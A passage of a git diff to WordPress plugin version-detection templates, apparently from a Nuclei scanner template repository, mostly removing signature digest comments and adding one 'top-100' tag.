4a0a00473045022100881b910cf85347244be1150fd232a31fa97d1f2fddc8c321f7f089d973f8ac7f022060a0ed743abaacf5f041a0fb45618b4e3e8d14fdcc843bec34c644911d9299b0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/redux-framework.yaml b/http/technologies/wordpress/plugins/redux-framework.yaml index e5b105a9b9..39130db767 100644 --- a/http/technologies/wordpress/plugins/redux-framework.yaml +++ b/http/technologies/wordpress/plugins/redux-framework.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502203b596a36fd6efb3a4e672ad84559fcfa02850988e269c4fd52a22a69675fffd5022100f8a4df34e4a8651f719d9cebd777d4448e7e52699c85cbb631c17bdb900f7771:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml b/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml index 6252d46ddc..39c497073c 100644 --- a/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml +++ b/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402206739464cb623c68ed0df4589d5fb6e8c8187a30edc196d5c141ce583cc9710f90220594570d6a11a0a2b1f724a1e6979aff64037b87859cd779e2893809994faceb9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/royal-elementor-addons.yaml b/http/technologies/wordpress/plugins/royal-elementor-addons.yaml index bbf6910a40..b848288b55 100644 --- a/http/technologies/wordpress/plugins/royal-elementor-addons.yaml +++ b/http/technologies/wordpress/plugins/royal-elementor-addons.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220790768da970a20f3bd890fd7fbf93cc7c879cdec2c756d5a35e09ee8cc10befe02203ec410b5bd4845fb981a8015149faee3ab99e449a7a2214480b8aff9c7e672d5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/safe-svg.yaml b/http/technologies/wordpress/plugins/safe-svg.yaml index 703b1f53ac..4d10178692 100644 --- a/http/technologies/wordpress/plugins/safe-svg.yaml +++ b/http/technologies/wordpress/plugins/safe-svg.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450220339f893e3efce940a548072d00db202c03fb7693cbed1792d998523d9d26d29d022100d6c6b606fa1ae7fd34985101c5bc5ccc2e804e5cc4337e9df621b3b384bd056f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/seo-by-rank-math.yaml b/http/technologies/wordpress/plugins/seo-by-rank-math.yaml index b4c674a93f..7aac0a153f 100644 --- a/http/technologies/wordpress/plugins/seo-by-rank-math.yaml +++ b/http/technologies/wordpress/plugins/seo-by-rank-math.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402201c50d8b4a45d0d53b144f8711b255a4c9388ec0a89f6aa8dd4cb04a03663d05d022012a6d49247249ccc01acc7c410f94c6c623b7fb71f5341d22b16063f6b9fb5b0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/sg-cachepress.yaml b/http/technologies/wordpress/plugins/sg-cachepress.yaml index 94a31ea600..d0cebd5316 100644 --- a/http/technologies/wordpress/plugins/sg-cachepress.yaml +++ b/http/technologies/wordpress/plugins/sg-cachepress.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022066b4e30f494404096d0e06a809a482c18f2c5b02167cdeddebf20f30e459ec90022047b680f4eb64ea4275e5fefdfa939a00b6748d5516b30f1944dc3ed1e12ed49e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/sg-security.yaml b/http/technologies/wordpress/plugins/sg-security.yaml index cafb729796..ff20779157 100644 --- a/http/technologies/wordpress/plugins/sg-security.yaml +++ b/http/technologies/wordpress/plugins/sg-security.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450221009151e10d0bea4aa9d96015842d91f721f116775d6cd106d5445ca431ad36e80a022071ef2a83242172beadfa4fddf5d0f4c94d84b1e528f6cf9ecd94d01ab23d98c8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml b/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml index a0d592972a..fffdc7d017 100644 --- a/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml +++ b/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402200d0dc36db6924f9753e3431c04706411a49e371cf494bced6959f09d1cd72a8e02203d583d761010935c92d7f01eae41be6fb3c7ae3b5090126e0098e56b30ca1bb8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml b/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml index 2ebbd61eee..7a9746a70d 100644 --- a/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml +++ b/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100d04ccb99971aa4953f9c33fad148bf56dfcb69a84eb15a5d8ec2413be6e2ef04022100ad0e2ea7af645ce2f85f7d2c69bea3ecfaa7ab76be934bbd7e27362e9949fcae:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/simple-custom-post-order.yaml b/http/technologies/wordpress/plugins/simple-custom-post-order.yaml index 2f6fe06e08..3fe86debf5 100644 --- a/http/technologies/wordpress/plugins/simple-custom-post-order.yaml +++ b/http/technologies/wordpress/plugins/simple-custom-post-order.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100c7ec6a6c72e7f9b92ee07627ef5236944f3ad85bb835e2012b5917101f0b6371022100fbb9b00ade408a0e02e1afc172bb10a9ea32d8d821e0ae3862146ddedbf47e73:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/simple-history.yaml b/http/technologies/wordpress/plugins/simple-history.yaml index 8eebac375e..18a7437e94 100644 --- a/http/technologies/wordpress/plugins/simple-history.yaml +++ b/http/technologies/wordpress/plugins/simple-history.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100e280f6cc83036eb0aecb41a3af235b4b3e420805c5341e13d1277176e1556a250220532425e58d01382b95f0dcdb7cd62112369ddf23c03511219b0f334166c7f3bf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/siteguard.yaml b/http/technologies/wordpress/plugins/siteguard.yaml index 3c606dfc0c..3deac58709 100644 --- a/http/technologies/wordpress/plugins/siteguard.yaml +++ b/http/technologies/wordpress/plugins/siteguard.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100ca28d01cc6a0c4bdf7cdd88f3c65d1918ee0f16bc4341e1e508869823d41e644022100a5f3b017070bfbfb7e3660eb72c0137b1a9e15cf79adfba7df97240a5b4e9fe2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/siteorigin-panels.yaml b/http/technologies/wordpress/plugins/siteorigin-panels.yaml index 9e8b4e32d7..e7e7c27682 100644 --- a/http/technologies/wordpress/plugins/siteorigin-panels.yaml +++ b/http/technologies/wordpress/plugins/siteorigin-panels.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100850fbfb7e5415f70da15b02df0366d757edd89f935212f47ea86d2a21a9a4339022100f01e816b9fca0b5b047c31fd6b3a1c27173fa4de510410719fe75e93a6b0aef9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/smart-slider-3.yaml b/http/technologies/wordpress/plugins/smart-slider-3.yaml index de37f47287..ad4ebefa4b 100644 --- a/http/technologies/wordpress/plugins/smart-slider-3.yaml +++ b/http/technologies/wordpress/plugins/smart-slider-3.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100f07e73eb69ce00ee7fee870029500541e07f225af88627b27269c8e31e71b7f302200815bb02877ae77bceb8c9530be35b481718fe497c0bd7fc49b4f0b5de265b62:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/so-widgets-bundle.yaml b/http/technologies/wordpress/plugins/so-widgets-bundle.yaml index c84a853e50..8e88c81c0a 100644 --- a/http/technologies/wordpress/plugins/so-widgets-bundle.yaml +++ b/http/technologies/wordpress/plugins/so-widgets-bundle.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502206ab8c36aaaac556056cf9f559856cf180547d99f7061a1e477aedcd96cfdfdc00221009c0475b08d5358f007fcfd298c460507237fa9a5cb4f2502c0258d06aeee92d1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml b/http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml index 088c5d768a..39d269fb85 100644 --- a/http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml +++ b/http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100a388d964cda6ce890cf8371ca2af110e20dba2fa79f7566e69c1a5149ef0b9670220499f6dcd84f30b4f6beda5172a6c1f2b58a23d9d5bf68ac5d0110e55b4dc47f7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml b/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml index b0416aea17..fc126d83c6 100644 --- a/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml +++ b/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100b611f8cc8d94d21bb2ad69ea7ea1c2d029b27795cf97d42308bc131e175bd02a02205ae253538fded0b1e320170831b74e0588c40aba36394565263c368aa1f84432:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/sucuri-scanner.yaml b/http/technologies/wordpress/plugins/sucuri-scanner.yaml index cd35b6852c..8c49a34259 100644 --- a/http/technologies/wordpress/plugins/sucuri-scanner.yaml +++ b/http/technologies/wordpress/plugins/sucuri-scanner.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022057847e86f4e979d7321f26c305f4325e80a5f9f061047db22933ec335f3cc5d40220773dc8aaf89c9acf7f05cc2fe3b9f38f72800493bf6d8fb23cf6c2582c802a93:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/table-of-contents-plus.yaml b/http/technologies/wordpress/plugins/table-of-contents-plus.yaml index 6ab6fe1857..6ac2212b4b 100644 --- a/http/technologies/wordpress/plugins/table-of-contents-plus.yaml +++ b/http/technologies/wordpress/plugins/table-of-contents-plus.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100beb785a9e4d69ab3178c5849b6f1a8c15b3aa25aa19cb7f11d255b085d85dd85022100cded374998ee7ca7200e9393618e26c97000a16fdeb87c9d3f05dc6f34670bad:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/tablepress.yaml b/http/technologies/wordpress/plugins/tablepress.yaml index 260bdd0b29..71c71b5ed1 100644 --- a/http/technologies/wordpress/plugins/tablepress.yaml +++ b/http/technologies/wordpress/plugins/tablepress.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022040b3d1faef230d8be754882ce985f16c4a5c035105fe24f1b92ce596bc28c64102205f2bf89c7811c9226fe2b901b5f5f9f81f61e40190e4f47bb5b30c7c19de36ff:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml b/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml index 2262dd822b..7b47adc274 100644 --- a/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml +++ b/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100ef63bff8df8caf334edd220d15dd71e9faa82ae57949ebac7d5cec174675cd76022100dfefce3818dc25208e445ac809436ebfea915a8e593b7b718dfe7fac0634bd1f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/templately.yaml b/http/technologies/wordpress/plugins/templately.yaml index d6efba4e31..286dfdaec6 100644 --- a/http/technologies/wordpress/plugins/templately.yaml +++ b/http/technologies/wordpress/plugins/templately.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402206eb440d991569aadd61685405f04e76d630cd661c12a03edc9da94d25bc03a380220783ded88acbe962891bf378e982ba7d1c32a4a31f6e80f7794e9b662bcab8903:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/the-events-calendar.yaml b/http/technologies/wordpress/plugins/the-events-calendar.yaml index 5b4adc339d..c4928059f6 100644 --- a/http/technologies/wordpress/plugins/the-events-calendar.yaml +++ b/http/technologies/wordpress/plugins/the-events-calendar.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402203b449aa05cc7772b0d3b99f0e02dd6669139ceacd7d0688c50bfa3abc572a03a02206cd534622bf5d253eef38d3da8edc8449fe3bc002453abd8cac5846954ebe5c1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/tinymce-advanced.yaml b/http/technologies/wordpress/plugins/tinymce-advanced.yaml index 6524c3e39b..f6a7836f35 100644 --- a/http/technologies/wordpress/plugins/tinymce-advanced.yaml +++ b/http/technologies/wordpress/plugins/tinymce-advanced.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100b40f9c9009a778b48ac8e103b61471ab8c02df63020e945920f79fde3120e8c0022041a028670298dad115a9b0a3201b3c6a7b43eed624a3cd6b68ee9d4ea328ede8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/translatepress-multilingual.yaml b/http/technologies/wordpress/plugins/translatepress-multilingual.yaml index d44ac6f3c0..b7af708c4f 100644 --- a/http/technologies/wordpress/plugins/translatepress-multilingual.yaml +++ b/http/technologies/wordpress/plugins/translatepress-multilingual.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022034e47f55df28d3cc395ff3994d4897692e075c01a100eb0a9e751d033c64cc7e022100bdc15fc9f9de350832157a7ee2b998fd0d3b4896d048dcfbabddbfffb288050b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml b/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml index 3464450509..61a793edf7 100644 --- a/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml +++ b/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402203055ba348257950a08f743d4b8ed4fa68ecae5258a1a3a50f1d9b64e67d64a600220792b43bba2b9907de0116b224403c9c236ca89fa8f41eb497ddc4bb147e0b163:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/under-construction-page.yaml b/http/technologies/wordpress/plugins/under-construction-page.yaml index 6edbbef639..0da88d5d3f 100644 --- a/http/technologies/wordpress/plugins/under-construction-page.yaml +++ b/http/technologies/wordpress/plugins/under-construction-page.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402206c7cfbeb34e7c4058e4d2e433c79e8c8a1eec1009df9992c4042a9bac388011b022074d0c36b4d6ebc4cd43f2b2bd966e04ecbf997a667a12d8eabd54695c7f86eb3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/updraftplus.yaml b/http/technologies/wordpress/plugins/updraftplus.yaml index 755e73a9ff..2b29428cf1 100644 --- a/http/technologies/wordpress/plugins/updraftplus.yaml +++ b/http/technologies/wordpress/plugins/updraftplus.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402205538a8e5786fcae19b0e505e0efbdcbae34fe6a46116b02ef8ab52108fd45f6602206332df2cefe682fbabba3bb3a0a58a45970d880db84c4692168c56071e1571cf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/user-role-editor.yaml b/http/technologies/wordpress/plugins/user-role-editor.yaml index 48cedfb5dd..181e619a7c 100644 --- a/http/technologies/wordpress/plugins/user-role-editor.yaml +++ b/http/technologies/wordpress/plugins/user-role-editor.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100ab8efd55600a6feb97f0bff3b2695b2a82f7300e542d2e3835cfb4e76a497573022100abbd747562da9c053bfbec900a5796d0419dfe23c77c4a556265834fbd2f4c58:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/w3-total-cache.yaml b/http/technologies/wordpress/plugins/w3-total-cache.yaml index 54b9dbfd62..8164eb4483 100644 --- a/http/technologies/wordpress/plugins/w3-total-cache.yaml +++ b/http/technologies/wordpress/plugins/w3-total-cache.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100e900f42129cdd40e5ba9bec8fc845392ea4149ca1de868a0f49144b8ac0491e702201ba0932284d21dc009081dd43b0274a889bad4c029f308fda58a114403f67781:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/webp-converter-for-media.yaml b/http/technologies/wordpress/plugins/webp-converter-for-media.yaml index 79a0ba4599..59554defdf 100644 --- a/http/technologies/wordpress/plugins/webp-converter-for-media.yaml +++ b/http/technologies/wordpress/plugins/webp-converter-for-media.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022025682fb39ca2080c465ef246fcca5bf21f27449c66e356f4afc7fcbb5d0f27d9022100c77ccabbce4f82aee21f6e9128a05df2b48a658d4c437ccbb81cde37e909b8f9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/webp-express.yaml b/http/technologies/wordpress/plugins/webp-express.yaml index 1cce1a6482..350fd9436b 100644 --- a/http/technologies/wordpress/plugins/webp-express.yaml +++ b/http/technologies/wordpress/plugins/webp-express.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100f3c115ad1b6bc865e4af4702ada3674abe546751fa444d1456c2be37a301febe022100c4507da89c53b586fca773a26421f641c0e81837e777257c11e38b7ebc7f47fe:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/widget-importer-exporter.yaml b/http/technologies/wordpress/plugins/widget-importer-exporter.yaml index 51a3670296..2ae6bafbba 100644 --- a/http/technologies/wordpress/plugins/widget-importer-exporter.yaml +++ b/http/technologies/wordpress/plugins/widget-importer-exporter.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100e168b89f7f3017f78ab9f95e8f8f44995ec31fc063cb36efb1c31b65754b0793022027ea98781d3f4b8c552455547e6d97bb13cf7d2e7421b0d5daeed110d8997770:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml b/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml index 63b34616c2..d0dc8d92bb 100644 --- a/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml +++ b/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a004830460221008450cb3d227ec4e59c05583c6ff608f40cca5c65a7b56ea355cc3a42f1e4737a022100ccfc7227c7bee39e5ed234b74327e34bfb97b4da7c8ddbac5a396c8c16b9eae8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml b/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml index cbbe6b7d5b..c49bbc2b6d 100644 --- a/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml +++ b/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100a4b71c3bdb87853c92c02fb95a90c02c1b52b6ff19a10893b28aa8be88bcf9da0221009b2127b546ab9396f54090cb741bca6744889f145ba5c875332f45e6e8f554fc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woo-variation-swatches.yaml b/http/technologies/wordpress/plugins/woo-variation-swatches.yaml index 2ffd4ab2d9..27586cbd9d 100644 --- a/http/technologies/wordpress/plugins/woo-variation-swatches.yaml +++ b/http/technologies/wordpress/plugins/woo-variation-swatches.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450221009f1fc1ec179b8f103c197708466e876043d01701734007023d10663f69eda10002204ddaa9a8e2c56acad4622e11c1a21612c7e14cacff2a713ab89034a98b8a58b4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml b/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml index 23223eb368..946272f0a9 100644 --- a/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502206352c15639aa03b2a1b0e4175e5e36be014131f350e4732d1ba5ff09e77f882f022100d9cc00c400eb37dd7cd3c73eb5ec6c2473e75ea79d2cad7cac581fcc01b34a32:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml b/http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml index 8dd23fc1ec..aa29706872 100644 --- a/http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100e6b3455b9a4067bac9e177492e003d96a76efe26c257360bb7c0e58a9fe24ad60220387aeddc681702fc5928821a4c6ebe648d755490be49af59fae2a6702895d0d7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-payments.yaml b/http/technologies/wordpress/plugins/woocommerce-payments.yaml index d99d72e3b7..290d53ab7e 100644 --- a/http/technologies/wordpress/plugins/woocommerce-payments.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-payments.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450221009f2385cd16916bd9272cdaa3110d0d9924790b97ecd7fbc82eb3e243ad64f7450220684f58ceac840ff56a87fd34907d4df7b14c3e6c865ec41a74268eea14d488cd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml b/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml index f8b12a99a1..f7c9ef9b1f 100644 --- a/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: woocommerce-paypal-payments wpscan: https://wpscan.com/plugin/woocommerce-paypal-payments - tags: tech,wordpress,wp-plugin,top-200 + tags: tech,wordpress,wp-plugin,top-100,top-200 http: - method: GET @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100e53b6bf3d1a47c96dbcacf1600910e815978dacba61cb162c36de87b9be3b80d022064deea85fae7d961718b7aa7a74f6208fdd4eb1a4465afbf1a5b850159866284:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml b/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml index 27661e088e..f1c16275a2 100644 --- a/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100fd7ecf3ce26da302c91d4753eee96f597b4014c5f2bf8015f42d0537e3815d01022100a063674b8c59a511ea08057a0b6eca9c77ef73f781d931e99898fdee3df172eb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-services.yaml b/http/technologies/wordpress/plugins/woocommerce-services.yaml index c4348a5c99..fc072e19d8 100644 --- a/http/technologies/wordpress/plugins/woocommerce-services.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-services.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402206b0d61d63a56586e6efa862c03cc72df0a4c282dd47c2596a9db1a416fdc7a3402203b811de7eab61537ed67ede0c8adecafdbfe52ceffbe5fcb7dfe09e1ae09388e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce.yaml b/http/technologies/wordpress/plugins/woocommerce.yaml index a93beeecea..da9df0e8a5 100644 --- a/http/technologies/wordpress/plugins/woocommerce.yaml +++ b/http/technologies/wordpress/plugins/woocommerce.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022040711480084a93ba22eb1541db54de58a0972570b7150695d258f294ca05c55902210084fa094a0e92fb6f2da40f10015478c9c1adc36562d3dfcbc55f44ef6cb234e0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wordfence.yaml b/http/technologies/wordpress/plugins/wordfence.yaml index b16859adb0..f8113d9750 100644 --- a/http/technologies/wordpress/plugins/wordfence.yaml +++ b/http/technologies/wordpress/plugins/wordfence.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450220312ad6709cddcbf96208dc1e5b534d3972eee20b78045c2cecdd493fd3c4cf770221009c1b7af188df7f0c7431d02d8ab32fc9f1667a8e295b51e86376589ac171d7f0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wordpress-importer.yaml b/http/technologies/wordpress/plugins/wordpress-importer.yaml index 6d14910d5e..5f80282ab2 100644 --- a/http/technologies/wordpress/plugins/wordpress-importer.yaml +++ b/http/technologies/wordpress/plugins/wordpress-importer.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502210097c53d10d1c8bec404c9ba48eda64528432d61703c9e1b8dee4621ca8e0e7e26022069ba4262f9924757d8881ab03af7e6c3148968c9f6666ba3765ce573ec31a754:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wordpress-seo.yaml b/http/technologies/wordpress/plugins/wordpress-seo.yaml index bbc5beffa4..5725d5bb3f 100644 --- a/http/technologies/wordpress/plugins/wordpress-seo.yaml +++ 